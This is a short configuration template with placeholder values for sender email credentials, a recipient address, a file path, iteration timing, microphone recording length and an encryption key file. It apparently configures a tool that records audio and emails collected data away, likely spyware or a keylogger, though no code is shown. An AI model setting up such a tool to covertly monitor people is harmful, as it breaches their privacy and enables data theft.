EMAIL_ADDRESS= Enter sender email
EMAIL_PASSWORD= Enter sender email password
TO_ADDRESS= Enter reciever email 
FILE_PATH=Enter File Path here
TIME_ITERATION=15
NUMBER_OF_ITERATIONS_END=3
MICROPHONE_TIME=10
KEY_FILE=encryption_key.txt
